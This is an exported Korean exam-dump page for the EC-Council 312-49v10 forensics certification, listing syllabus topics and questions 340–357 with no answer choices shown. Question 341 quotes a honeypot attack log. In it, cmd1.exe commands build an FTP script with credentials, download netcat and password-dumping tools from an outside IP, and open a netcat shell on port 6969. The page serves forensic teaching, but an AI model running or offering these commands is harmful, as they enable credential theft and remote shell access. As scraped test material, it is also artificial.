이 페이지는 무료 시험 덤프 자료에서 내보내졌습니다. [ http://exams.dumpsmaterials.com ]
내보내기 날짜: Thu Dec 5 2:41:41 2024 / +0000 GMT

모의고사 문제 덤프 번들로 EC-COUNCIL 312-49v10 시험 합격 [Q340-Q357]




모의고사 문제 덤프 번들로 EC-COUNCIL 312-49v10 시험 합격

2022 유효한 312-49v10 시험 답안 및 EC-COUNCIL 시험 PDF


EC-COUNCIL 312-49v10 시험 강의 계획서 주제:

주제세부 정보
주제 1
  • 데이터베이스 포렌식
  • 네트워크 포렌식
  • Windows 포렌식
주제 2
  • 하드 디스크 및 파일 시스템 이해
  • 이메일 범죄 조사
주제 3
  • 컴퓨터 포렌식 조사 프로세스
  • 다크 웹 포렌식
  • 모바일 포렌식
주제 4
  • 데이터 수집 및 복제
  • Linux 및 Mac 포렌식

 

질문 340
Windows XP 부팅이 끝날 때 로그온 대화 상자를 초기화하기 위해 처리되는 파일은 무엇인가요?

 
 
 
 

질문 341
다음 발췌 내용은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일 권한 정식화 취약점(유니코드 공격)은 일반적으로 스크립트를 실행할 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있게 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini를 표시하는 데 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 플레이하는 것으로 전환합니다. RDS 취약점을 통해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 공격자는 빠른 쿼리를 통해 디렉터리가 존재하는지 확인하고, msadcs.dll에 대한 쿼리를 통해 해당 디렉터리가 올바르게 작동하는 것을 확인합니다. 공격자가 RDS 쿼리를 수행하면 아래와 같이 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 유추할 수 있나요?

 
 
 
 

질문 342
Office 문서(Word, Excel, PowerPoint)에는 문서를 만든 컴퓨터의 MAC 또는 고유 식별자를 추적할 수 있는 코드가 포함되어 있습니다. 이 코드를 무엇이라고 하나요?

 
 
 
 

질문 343
모든 Blackberry 이메일은 결국 어떤 독점적인 RIM 운영 메커니즘을 통해 송수신됩니까?

 
 
 
 

질문 344
다음 중 Windows 기반 서버에서 실행 중인 모든 네트워크 서비스를 표시하는 명령은 무엇인가요?

 
 
 
 

질문 345
조사자가 가상 머신의 인스턴스를 확보하고 포렌식 조사 프로세스를 시작할 수 있는 클라우드 모델은 무엇인가요?

 
 
 
 

질문 346
"유휴" 시스템이란 무엇이라고도 하나요?

 
 
 
 

질문 347
다음 중 ESE(확장 가능한 저장 엔진) 데이터베이스 형식을 사용하여 기록, 캐시 및 쿠키를 포함한 검색 기록을 저장하는 웹 브라우저는?

 
 
 
 

질문 348
파일 할당 테이블에서 첫 번째 예약 섹터의 이름은 무엇인가요?

 
 
 
 

질문 349
영장을 받을 때는 다음 사항을 준수하는 것이 중요합니다:

 
 
 
 

질문 350
유휴 스캔에 Windows 컴퓨터보다 Linux/유닉스 기반 컴퓨터를 사용하는 것이 더 좋은 이유는 무엇인가요?

 
 
 
 

질문 351
다음 중 논리 파일 시스템 오류를 복구하는 데 도움이 되는 Windows 유틸리티는 무엇인가요?

 
 
 
 

질문 352
다음 중 Linux 부팅 프로세스에서 시스템 하드웨어의 초기화와 관련된 단계는 무엇인가요?

 
 
 
 

질문 353
블랙베리 디바이스 비밀번호 키퍼에는 어떤 암호화 기술이 사용되나요?

 
 
 
 

질문 354
플로리다주의 한 주 정부 기관에서 발생한 네트워크 침해를 조사하던 Cylie는 침입자가 IP 패킷을 과부하시켜 회사 방화벽에 접속할 수 있었다는 사실을 발견합니다. 그 후 실리는 조사를 통해 침입자가 회사 전화 시스템을 해킹하고 PBX 시스템의 하드 드라이브를 사용하여 공유 음악 파일을 저장했다는 사실을 알게 됩니다. 회사 PBX 시스템에 대한 이 공격을 무엇이라고 부를까요?

 
 
 
 

질문 355
다음 디렉터리에는 무엇이 보관되나요? HKLMSECURITYPolicySecrets

 
 
 
 

질문 356
공격자의 컴퓨터가 유휴 스캔에서 열린 포트의 좀비 컴퓨터로 31400의 IPID를 보내면 어떻게 대응해야 할까요?

 
 
 
 

질문 357
Chris는 고객 중 한 명이 신고한 해킹 사건을 조사해 달라는 요청을 받았습니다. 회사는 공격에 내부 공범이 연루된 것으로 의심하고 있습니다. 사고 현장에 도착한 Chris는 물리적 구역을 확보하고 시각적 미디어를 사용하여 현장을 녹화합니다. 그리고 어떤 식으로든 시스템을 방해하지 않도록 전원 플러그를 뽑아 시스템을 종료합니다. 그는 모든 케이블과 커넥터를 분리하기 전에 라벨을 붙입니다. 다음 이벤트 순서는 무엇이라고 생각하시나요?